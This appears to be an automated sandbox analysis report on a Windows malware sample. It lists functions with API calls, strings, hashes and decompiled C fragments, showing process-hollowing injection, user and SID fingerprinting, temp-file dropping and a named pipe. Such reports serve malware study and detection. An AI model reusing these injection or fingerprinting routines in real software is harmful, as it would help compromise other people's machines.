CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B5F
GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B6F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B7D
DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B80
GetLastError.KERNEL32(?,?,?,00409A60,?,?,00409E9D,?,?,?,?,?,00409E9D,?,00000022,?), ref: 00406B96

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseErrorHandleLast$File$CreateDeleteDiskFreeSpace
String ID:
API String ID: 3188212458-0
Opcode ID: 9d4c85761783c6bedd22d93ddceda0b583ceddf5ed0ddaf9bf98be4dbd44beb2
Instruction ID: d1ca1be21706f377461b54c84c0418c788cbd3a22021bcedc5f811c3684b10f5
Opcode Fuzzy Hash: 9d4c85761783c6bedd22d93ddceda0b583ceddf5ed0ddaf9bf98be4dbd44beb2
Instruction Fuzzy Hash: E131F1B2900108BFDB00DFA09D44ADF7F78EF48314F158076E212F7291D674A9618F69

Uniqueness

Uniqueness Score: -1.00%

Function 02166761, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 182COMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(?,00000008), ref: 021667AC
htonl.WS2_32(?), ref: 021667C8
htonl.WS2_32(?), ref: 021667D7
GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 021668DA
ExitProcess.KERNEL32 ref: 021669A5

Strings

except_info, xrefs: 02166978
localcfg, xrefs: 0216697D

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: Processhtonl$CurrentExitHugeRead
String ID: except_info$localcfg
API String ID: 1150517154-3605449297
Opcode ID: 9895dd2e79d38ff6447f40a868429f3d8bfef7524ed1ea596fca3f6cba339201
Instruction ID: 8b02929ee1771441cb7e532ce0635a321038036f1b91177d8cead75222d9266c
Opcode Fuzzy Hash: 9895dd2e79d38ff6447f40a868429f3d8bfef7524ed1ea596fca3f6cba339201
Instruction Fuzzy Hash: D3616F72940248AFDB609FB4DC45FEA77E9FB08300F248066F96DD2161DB759990CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406F5F, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00406F5F(long _a4, long _a8) {
				void* _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				void _v84;
				char _v212;
				CHAR* _t36;
				void* _t53;
				intOrPtr* _t54;
				char _t62;
				void* _t65;
				char* _t66;
				intOrPtr _t67;
				CHAR* _t68;
				void* _t69;

				_t68 = _a4;
				 *_t68 = 0;
				if(GetUserNameA(_t68,  &_a8) == 0) {
					return 0;
				}
				_t36 = _t68;
				_t66 =  &(_t36[1]);
				do {
					_t62 =  *_t36;
					_t36 =  &(_t36[1]);
				} while (_t62 != 0);
				_a8 = _t36 - _t66;
				_a4 = 0x7c;
				_v12 = 0x80;
				if(LookupAccountNameA(0, _t68,  &_v84,  &_a4,  &_v212,  &_v12,  &_v16) == 0) {
					L8:
					_a8 = _a8 + wsprintfA( &(_t68[_a8]), "/%d", E00406EDD());
					return _a8;
				}
				E0040EF00( &(_t68[_a8]), "/");
				_a8 = _a8 + 1;
				_push( &_v8);
				_t53 =  &_v84;
				_push(_t53);
				L0040F4AA();
				if(_t53 == 0) {
					goto L8;
				}
				_t54 = _v8;
				_t20 = _t54 + 1; // 0x121
				_t65 = _t20;
				do {
					_t67 =  *_t54;
					_t54 = _t54 + 1;
				} while (_t67 != 0);
				_a4 = _t54 - _t65;
				E0040EE08( &(_t68[_a8]), _v8, _t54 - _t65 + 1);
				_a8 = _a8 + _a4;
				_t69 = _t69 + 0xc;
				LocalFree(_v8);
				goto L8;
			}

APIs

GetUserNameA.ADVAPI32(?,0040D7C3), ref: 00406F7A
LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,0040D7C3), ref: 00406FC1
ConvertSidToStringSidA.ADVAPI32(?,00000120), ref: 00406FE8
LocalFree.KERNEL32(00000120), ref: 0040701F
wsprintfA.USER32 ref: 00407036

Strings

/%d, xrefs: 00407030
|, xrefs: 00406FB3

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Name$AccountConvertFreeLocalLookupStringUserwsprintf
String ID: /%d$|
API String ID: 676856371-4124749705
Opcode ID: a4e95b79f46088df25ad898cee238acd61ae00be348fc6b2bdbab1b8b404bd7d
Instruction ID: 25602f0bb6ce76eb5d01febd46d0227a680cec7408ef54ec30c82d1084126da1
Opcode Fuzzy Hash: a4e95b79f46088df25ad898cee238acd61ae00be348fc6b2bdbab1b8b404bd7d
Instruction Fuzzy Hash: B5313C72900209BFDB01DFA5DC45BDB7BBCEF04314F048166F949EB241DA79EA588B98

Uniqueness

Uniqueness Score: -1.00%

Function 02162F71, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 85memorylibrarystringCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?), ref: 02162F8A
LoadLibraryA.KERNEL32(?), ref: 02162F9A
GetProcAddress.KERNEL32(00000000,004103F0), ref: 02162FB1
GetProcessHeap.KERNEL32(00000000,00000108), ref: 02162FE9
RtlAllocateHeap.NTDLL(00000000), ref: 02162FF0
lstrcpyn.KERNEL32(00000008,?,000000FF), ref: 0216301B

Strings

dnsapi.dll, xrefs: 02162F79

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: Heap$AddressAllocateHandleLibraryLoadModuleProcProcesslstrcpyn
String ID: dnsapi.dll
API String ID: 1242400761-3175542204
Opcode ID: 7f5d185b3cfc49c95be658a26291c7e098e834ef0b89546cb75d65dd2dad2050
Instruction ID: c82ba3fadbc1a7cf1304542260fd175dbb94f37fee8eafb362e8b4144b4b8f9a
Opcode Fuzzy Hash: 7f5d185b3cfc49c95be658a26291c7e098e834ef0b89546cb75d65dd2dad2050
Instruction Fuzzy Hash: 1C219071D8022ABBCB229B54DC48ABFBBB8EF08B50F1084A1F815E7100D7B09A9587D4

Uniqueness

Uniqueness Score: -1.00%

Function 00406CC9, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 84
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00406CC9(void* __ecx) {
				_Unknown_base(*)()* _t8;
				CHAR* _t17;
				void* _t18;
				void* _t23;
				char _t25;
				void* _t34;

				_t23 = __ecx;
				if( *0x412e08 != 0) {
					L14:
					return 0x412e08;
				}
				_t8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetSystemWow64DirectoryA");
				if(_t8 == 0) {
					L4:
					if(GetSystemDirectoryA(0x412e08, 0x104) == 0 ||  *0x412e08 == 0) {
						if(GetWindowsDirectoryA(0x412e08, 0x104) == 0 ||  *0x412e08 == 0) {
							E0040EF00(0x412e08, E00402544(0x4122f8, 0x410664, 0xb, 0xe4, 0xc8));
							E0040EE2A(_t23, 0x4122f8, 0, 0x100);
							_t34 = _t34 + 0x28;
						}
						E0040EF1E(0x412e08, E00402544(0x4122f8, 0x410658, 0xb, 0xe4, 0xc8));
						E0040EE2A(_t23, 0x4122f8, 0, 0x100);
					}
					L10:
					_t17 = 0x412e08;
					goto L11;
					L11:
					_t25 =  *_t17;
					_t17 =  &(_t17[1]);
					if(_t25 != 0) {
						goto L11;
					} else {
						_t18 = _t17 - 0x412e09;
						if( *((char*)(_t18 + 0x412e07)) != 0x5c) {
							 *((char*)(_t18 + 0x412e08)) = 0x5c;
							 *((char*)(_t18 + 0x412e09)) = _t25;
						}
						goto L14;
					}
				}
				_push(0x104);
				_push(0x412e08);
				if( *_t8() == 0 ||  *0x412e08 == 0) {
					goto L4;
				} else {
					goto L10;
				}
			}

APIs

GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,004122F8,000000E4,00406DDC,000000C8), ref: 00406CE7
GetProcAddress.KERNEL32(00000000), ref: 00406CEE
GetSystemDirectoryA.KERNEL32 ref: 00406D14
GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B

Strings

C:\Windows\SysWOW64\, xrefs: 00406CC9, 00406CD1, 00406CFE, 00406D05, 00406D13, 00406D1E, 00406D2A, 00406D42, 00406D5F, 00406D85
kernel32, xrefs: 00406CE2
GetSystemWow64DirectoryA, xrefs: 00406CDD

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Directory$AddressHandleModuleProcSystemWindows
String ID: C:\Windows\SysWOW64\$GetSystemWow64DirectoryA$kernel32
API String ID: 1082366364-3395550214
Opcode ID: d09e83db478442fd4945e9c658ec75f055a3aceb6853e703a7e434fe43434249
Instruction ID: 283af98db633f334a3c96cb566aa979ace8a56c3c0d7b64ee1e11c7fdc897f47
Opcode Fuzzy Hash: d09e83db478442fd4945e9c658ec75f055a3aceb6853e703a7e434fe43434249
Instruction Fuzzy Hash: AC21F26174034479F72157225D89FF72E4C8F52744F19407AF804B62D2CAED88E582AD

Uniqueness

Uniqueness Score: -1.00%

Function 021699CC, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82threadinjectionprocessCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02169A01
GetThreadContext.KERNEL32(?,?), ref: 02169A3B
TerminateProcess.KERNEL32(?,00000000), ref: 02169A49
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02169A81
SetThreadContext.KERNEL32(?,00010002), ref: 02169A9E
ResumeThread.KERNEL32(?), ref: 02169AAB

Strings

D, xrefs: 021699F9

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
String ID: D
API String ID: 2981417381-2746444292
Opcode ID: e2726c898831fa2e77ccd26efcb7f3ad26579022b5c1c2510a23e725eb230ef9
Instruction ID: f293c89f8643ccd455a9b486fbc729f43ead26b3691a98200b2c6449cf9dd414
Opcode Fuzzy Hash: e2726c898831fa2e77ccd26efcb7f3ad26579022b5c1c2510a23e725eb230ef9
Instruction Fuzzy Hash: 3D216BB1941119BBDB11DBA1DC09EFF7BBCEF05754F004060BA19E2050EB758A54CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 02161BEC, Relevance: 12.1, APIs: 8, Instructions: 106memorylibraryCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(004102D8), ref: 02161C01
LoadLibraryA.KERNEL32(004102C8), ref: 02161C0F
GetProcessHeap.KERNEL32 ref: 02161C6D
RtlAllocateHeap.NTDLL(00000000,00000000,00000288), ref: 02161C86
RtlReAllocateHeap.NTDLL(?,00000000,00000000,?), ref: 02161CAA
HeapFree.KERNEL32(?,00000000,00000000), ref: 02161CEB
FreeLibrary.KERNEL32(?), ref: 02161CF4

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreeLibrary$LoadProcessinet_addr
String ID:
API String ID: 2324436984-0
Opcode ID: 86649b882a12f673409f1c62972542be89ea1fb211e92df17ca9b312c060c3f6
Instruction ID: 96e25125a871faec42b64db0e25c2e7f93eb4a6e5abdeb17867e56104d8c83b8
Opcode Fuzzy Hash: 86649b882a12f673409f1c62972542be89ea1fb211e92df17ca9b312c060c3f6
Instruction Fuzzy Hash: A0316D72940219BFCB119FE4DC8C8FEBBBAEB45346B24447AE509E2210D7B54E90DB54

Uniqueness

Uniqueness Score: -1.00%

Function 02166CB0, Relevance: 10.6, APIs: 7, Instructions: 106fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02166CCD
GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02166D0B
GetLastError.KERNEL32 ref: 02166D90
CloseHandle.KERNEL32(?), ref: 02166D9E
GetLastError.KERNEL32 ref: 02166DBF
DeleteFileA.KERNEL32(?), ref: 02166DD0
GetLastError.KERNEL32 ref: 02166DE6

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: ErrorLast$File$CloseCreateDeleteDiskFreeHandleSpace
String ID:
API String ID: 3873183294-0
Opcode ID: 9d4c85761783c6bedd22d93ddceda0b583ceddf5ed0ddaf9bf98be4dbd44beb2
Instruction ID: 7d46946dd402a5af1157c0a582e5872915076f53432ab56f73881963a3ea9949
Opcode Fuzzy Hash: 9d4c85761783c6bedd22d93ddceda0b583ceddf5ed0ddaf9bf98be4dbd44beb2
Instruction Fuzzy Hash: 34312172840289FFCB11DFA59D48EEEBF7DEF48300F148066E291E7210D7764AA58B60

Uniqueness

Uniqueness Score: -1.00%

Function 02166F19, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\hhzzhxuz,0216702C), ref: 02166F37
GetProcAddress.KERNEL32(00000000), ref: 02166F3E
GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 02166F64
GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 02166F7B

Strings

C:\Windows\SysWOW64\, xrefs: 02166F19, 02166F21, 02166F4E, 02166F55, 02166F63, 02166F6E, 02166F7A, 02166F92, 02166FAF, 02166FD5
\\.\pipe\hhzzhxuz, xrefs: 02166F20

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: Directory$AddressHandleModuleProcSystemWindows
String ID: C:\Windows\SysWOW64\$\\.\pipe\hhzzhxuz
API String ID: 1082366364-1292771290
Opcode ID: 04a770052eb57bbfbb30415af63bc188d31a19c33639d4dbddcadc0e825ea320
Instruction ID: 29829075f3029687a9720957624bc894576efb52df833b87c2e9f6b4342cd382
Opcode Fuzzy Hash: 04a770052eb57bbfbb30415af63bc188d31a19c33639d4dbddcadc0e825ea320
Instruction Fuzzy Hash: 8821CD617813847EF7225321AC9CFBF2E4D8B52B58F1880A5F904E6090CBDD84B686AD

Uniqueness

Uniqueness Score: -1.00%

Function 0216AA11, Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 247stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 0216AACE

Strings

, xrefs: 0216AB9C
localcfg, xrefs: 0216AD5B

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: lstrlen
String ID: $localcfg
API String ID: 1659193697-2018645984
Opcode ID: e25caa720acfe6edeb1ed6cfdeeca69567da959aa4b90cf3eb174d19221d8523
Instruction ID: 440d5eaeed1c64f1149074d8460aa558119ee8a5819bd44fb2c6f49f46e892d1
Opcode Fuzzy Hash: e25caa720acfe6edeb1ed6cfdeeca69567da959aa4b90cf3eb174d19221d8523
Instruction Fuzzy Hash: A6713972AC0309AEDF318B98DC8DFBE776AEF00319F154066F905B2090DF6299A4CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0040E8A1, Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 172
stringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040E8A1(void* __edx, char _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16) {
				CHAR* _v8;
				signed int _v12;
				intOrPtr _v16;
				CHAR* _v20;
				intOrPtr _v24;
				CHAR* _v28;
				CHAR* _v32;
				intOrPtr _v36;
				char _v37;
				char _v52;
				char _v56;
				intOrPtr _t87;
				intOrPtr _t95;
				int _t126;
				void* _t136;
				void* _t138;
				CHAR* _t139;
				void* _t146;
				char _t150;
				void* _t154;
				void* _t158;
				void* _t159;

				_t146 = __edx;
				_v20 = 0;
				E0040DD05();
				_t150 = _a4;
				_t158 = E0040DD84(_t150, _a8);
				_pop(_t138);
				if(_t158 != 0) {
					L2:
					_t16 = _t158 + 0x30; // 0x30
					_v8 = E00402419(_t138, _t16,  *((intOrPtr*)(_t158 + 0x24)), _a12);
					_t21 = lstrlenA(_a12) + 1; // 0x1
					_t136 = _t21;
					_t87 = lstrlenA(_a16) + _t136 + 1;
					_v16 = _t87;
					if(_v8 == 0) {
						_t139 =  *((intOrPtr*)(_t158 + 0x24));
						_v12 = _v12 & 0x00000000;
						_v8 = _t139;
						_t152 = _t139;
					} else {
						_t126 = lstrlenA(_v8);
						_t152 = _v8 - _t136 - _t158 + 0xffffffd0;
						_v12 = _t126 + _t136 + 1;
						_t87 = _v16;
						_v8 = _v8 - _t136 - _t158 + 0xffffffd0;
					}
					if(_v12 == _t87) {
						E0040EE08(_t152 + _t158 + 0x30, _a12, _t136);
						E0040EE08(_t152 + _t136 + _t158 + 0x30, _a16, _v16 - _t136);
						_t77 = _t158 + 0x30; // 0x30
						_t95 = E004024C2(_t77,  *((intOrPtr*)(_t158 + 0x24)), 0);
						if( *((intOrPtr*)(_t158 + 0x20)) != _t95) {
							 *((intOrPtr*)(_t158 + 0x20)) = _t95;
							 *0x4136c0 = 1;
						}
					} else {
						_t41 = _t87 + 0x24; // 0x24
						_t154 = E0040EBCC( *((intOrPtr*)(_t158 + 0x24)) - _v12 + _t41);
						if(_t154 != 0) {
							_t43 = _t158 + 0xc; // 0xc
							E0040EE08(_t154, _t43,  &(_v8[0x24]));
							 *((intOrPtr*)(_t154 + 0x18)) =  *((intOrPtr*)(_t158 + 0x24)) - _v12 + _v16;
							_v20 =  &(_v8[_t154]);
							E0040EE08( &(( &(_v8[_t154]))[0x24]), _a12, _t136);
							E0040EE08( &(_v20[_t136 + 0x24]), _a16, _v16 - _t136);
							E0040EE08( &(_v20[_v16 + 0x24]),  &(( &(_v8[_v12]))[_t158 + 0x30]),  *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12);
							_t66 = _t154 + 0x24; // 0x24
							 *((intOrPtr*)(_t154 + 0x14)) = E004024C2(_t66,  *((intOrPtr*)(_t154 + 0x18)), 0);
							E0040DF4C( *((intOrPtr*)(_t158 + 0x24)) - _v8 - _v12, _t154);
							E0040EC2E(_t154);
							_v20 = 1;
						}
					}
					L10:
					E0040DD69();
					return _v20;
				}
				_v56 = _t150;
				_v28 = 0;
				_v24 = 3;
				lstrcpynA( &_v52, _a8, 0x10);
				_v37 = 0;
				_v32 = 0;
				_v36 = E004024C2( &_v20, 0, 0);
				E0040DF4C(_t146,  &_v56);
				_t158 = E0040DD84(_t150, _a8);
				_t159 = _t159 + 0x18;
				if(_t158 == 0) {
					goto L10;
				}
				goto L2;
			}

APIs

Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53

Part of subcall function 0040DD84: lstrcmpiA.KERNEL32(80000011,00000000,00000108,80000001,00000000,0040DE62,80000001,80000005,00000108,00000000,000000E4,00000000,?,0040E3A7,000000F0), ref: 0040DDB5

lstrcpynA.KERNEL32(?,00401E84,00000010,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?), ref: 0040E8DE
lstrlenA.KERNEL32(?,localcfg,?,flags_upd,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E935
lstrlenA.KERNEL32(00000001,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?,0000000A), ref: 0040E93D
lstrlenA.KERNEL32(00000000,?,?,?,?,?,0040EAAA,?,?,00000001,?,00401E84,?), ref: 0040E94F

Strings

flags_upd, xrefs: 0040E8A7
localcfg, xrefs: 0040E8AB

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$CountCurrentExchangeInterlockedThreadTicklstrcmpilstrcpyn
String ID: flags_upd$localcfg
API String ID: 204374128-3505511081
Opcode ID: 798df9beac1de9cfe9593c9a5200f7c4a69fe291944888fed16d288fbbf397d9
Instruction ID: 4a5a107d8aad74d0ab91cd578fe54778089971c235e688b3f19fdb3cdc8cf470
Opcode Fuzzy Hash: 798df9beac1de9cfe9593c9a5200f7c4a69fe291944888fed16d288fbbf397d9
Instruction Fuzzy Hash: A5514F7290020AAFCB00EFE9C985DAEBBF9BF48308F14452EE405B3251D779EA548B54

Uniqueness

Uniqueness Score: -1.00%

Function 0216E8A4, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 96stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0216DF55: GetCurrentThreadId.KERNEL32 ref: 0216DFA3

lstrcmp.KERNEL32(00410178,00000000), ref: 0216E8E3
lstrcpyn.KERNEL32(00000008,00000000,0000000F,?,00410170,00000000,?,02166111), ref: 0216E939
lstrcmp.KERNEL32(?,00000008), ref: 0216E972

Strings

A, xrefs: 0216E949, 0216E94E
A, xrefs: 0216E8AF, 0216E8B6, 0216E91F, 0216E981
A, xrefs: 0216E989

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: lstrcmp$CurrentThreadlstrcpyn
String ID: A$ A$ A
API String ID: 2920362961-1846390581
Opcode ID: 22b7ec265cbf58d9e118b1c9ae896798d4c4cc7fc0edb460ff72d5a9b3fd5feb
Instruction ID: 1a3b1b2fb3dfee1b1b9d873e5930f147e231b92e089638c8af1132c27950c61f
Opcode Fuzzy Hash: 22b7ec265cbf58d9e118b1c9ae896798d4c4cc7fc0edb460ff72d5a9b3fd5feb
Instruction Fuzzy Hash: FD31AF35A80715DFDB318F24D888BBA7BE8EF05324F04863AE55587590E770E8A4CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00406BA7, Relevance: 9.1, APIs: 6, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00406BA7(CHAR* _a4) {
				long _v8;
				long _v12;
				long _t14;
				int _t19;
				void* _t28;
				void* _t39;

				_push(_t30);
				if(IsBadCodePtr( *0x4130ac) == 0) {
					_push( &_v8);
					_push(0);
					if( *0x4130ac() == 0) {
						_t28 = E0040EBCC(_v8);
						if(_t28 == 0) {
							L7:
							_t14 = 0;
						} else {
							_push( &_v8);
							_push(_t28);
							if( *0x4130ac() == 0) {
								_v12 = 0;
								_t39 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0);
								if(_t39 != 0xffffffff) {
									_t19 = WriteFile(_t39, _t28, _v8,  &_v12, 0);
									_push(_t39);
									if(_t19 != 0) {
										CloseHandle();
										E0040EC2E(_t28);
										_t14 = _v8;
									} else {
										CloseHandle();
										DeleteFileA(_a4);
										goto L9;
									}
								} else {
									L9:
									E0040EC2E(_t28);
									_t14 = 0;
								}
							} else {
								E0040EC2E(_t28);
								goto L7;
							}
						}
					} else {
						_t14 = 0;
					}
					return _t14;
				} else {
					return 0;
				}
			}

APIs

IsBadCodePtr.KERNEL32 ref: 00406BB2

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Code
String ID:
API String ID: 3609698214-0
Opcode ID: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
Instruction ID: deae59b9a6c18e17a8054c2740d34a6eafe128a66e3352cd220e92de8f8b68f4
Opcode Fuzzy Hash: 39c3a5a53f78f07926ecb9a894269625e93d17a87676cf1a9de91011702fa4cf
Instruction Fuzzy Hash: D7218B72208115FFEB10ABB1ED49EDF3EACDB08364B218436F543F1091EA799A50966C

Uniqueness

Uniqueness Score: -1.00%

Function 02166DF7, Relevance: 9.1, APIs: 6, Instructions: 84COMMON

Download Yara Rule

APIs

IsBadCodePtr.KERNEL32 ref: 02166E02

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: Code
String ID:
API String ID: 3609698214-0
Opcode ID: dbd61df3ebb78cc6fa2ed7637639bc7d17aa9fbedb66480432ceb7f56d018bc4
Instruction ID: 7b7a2fe0ade8d085e0f5fd65f073fb8bf637c10afe0f6cd9bfb1bc6b9abb5c7a
Opcode Fuzzy Hash: dbd61df3ebb78cc6fa2ed7637639bc7d17aa9fbedb66480432ceb7f56d018bc4
Instruction Fuzzy Hash: 87216A76684105FFDB149BE0EC4CEFF3EADDB486A5B218125F502D10A0EB75CA60DA74

Uniqueness

Uniqueness Score: -1.00%

Function 00409064, Relevance: 9.1, APIs: 6, Instructions: 83
filestringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00409064(void* __eflags, void* _a4, CHAR* _a8) {
				long _v8;
				char _v1032;
				signed int _t29;
				signed int _t62;
				void* _t64;

				GetTempPathA(0x400,  &_v1032);
				E00408274( &_v1032);
				_t29 = E0040ECA5();
				_t62 = 9;
				_push(_t29 % _t62);
				_push(E0040ECA5() % _t62);
				_push(E0040ECA5() % _t62);
				_push(E0040ECA5() % _t62);
				_push( &_v1032);
				wsprintfA(_a8, E00402544(0x4122f8, 0x410794, 0xf, 0xe4, 0xc8));
				E0040EE2A(_t62, 0x4122f8, 0, 0x100);
				_t64 = CreateFileA(_a8, 0x40000000, 0, 0, 2, 0, 0);
				if(_t64 <= 0) {
					return 0;
				}
				WriteFile(_t64, _a4, lstrlenA(_a4),  &_v8, 0);
				CloseHandle(_t64);
				return 1;
			}

0x0040907b
0x00409088
0x0040908e
0x00409095
0x0040909c
0x004090a8
0x004090b4
0x004090c9
0x004090ca
0x004090e9
0x004090f8
0x00409114
0x00409118
0x00000000
0x0040913f
0x0040912d
0x00409134
0x00000000

APIs

GetTempPathA.KERNEL32(00000400,?,00000000,004122F8), ref: 0040907B
wsprintfA.USER32 ref: 004090E9
CreateFileA.KERNEL32(004122F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
CloseHandle.KERNEL32(00000000), ref: 00409134

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
String ID:
API String ID: 2439722600-0
Opcode ID: 604c9dfb72d4c575960ef67a32ff120fb0d8ccbeb60d369b3b0ad4a9b30ad2f3
Instruction ID: 58bbe077760212e8da181cf829ffda1a70542de1f4ba4b23f7e3a80b8f6fba70
Opcode Fuzzy Hash: 604c9dfb72d4c575960ef67a32ff120fb0d8ccbeb60d369b3b0ad4a9b30ad2f3
Instruction Fuzzy Hash: 451175B26401147AF7246723DD0AFEF3A6DDBC8704F04C47AB70AB50D1EAB94A519668

Uniqueness

Uniqueness Score: -1.00%

Function 021692B4, Relevance: 9.1, APIs: 6, Instructions: 83filestringCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000400,?), ref: 021692CB
wsprintfA.USER32 ref: 02169339
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0216935E
lstrlen.KERNEL32(?,?,00000000), ref: 02169372
WriteFile.KERNEL32(00000000,?,00000000), ref: 0216937D
CloseHandle.KERNEL32(00000000), ref: 02169384

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
String ID:
API String ID: 2439722600-0
Opcode ID: 15e5744a609ce20ae0f07ead06a63c4ecb295d114b6c11b49a51968f57c888d1
Instruction ID: 49980154c8c569d8cc6038c2ce90048c6ff5ba6b79f46e2149b1d196cf0c7bc2
Opcode Fuzzy Hash: 15e5744a609ce20ae0f07ead06a63c4ecb295d114b6c11b49a51968f57c888d1
Instruction Fuzzy Hash: 8F1172B66801247FE7246775ED0DFFF3A6EDBC9B00F00C165BB09A5090EBB44E558AA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040DD05, Relevance: 9.0, APIs: 6, Instructions: 34
threadsleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DD05() {
				long _t4;
				long _t10;

				_t10 = GetTickCount();
				while(InterlockedExchange(0x4136b4, 1) != 0) {
					if(GetCurrentThreadId() !=  *0x4136b8) {
						if(GetTickCount() - _t10 >= 0x2710) {
							 *0x4136bc =  *0x4136bc & 0x00000000;
						} else {
							Sleep(0);
							continue;
						}
					}
					L7:
					_t4 = GetCurrentThreadId();
					 *0x4136bc =  *0x4136bc + 1;
					 *0x4136b8 = _t4;
					return _t4;
				}
				goto L7;
			}

0x0040dd17
0x0040dd41
0x0040dd2c
0x0040dd37
0x0040dd4c
0x0040dd39
0x0040dd3b
0x00000000
0x0040dd3b
0x0040dd37
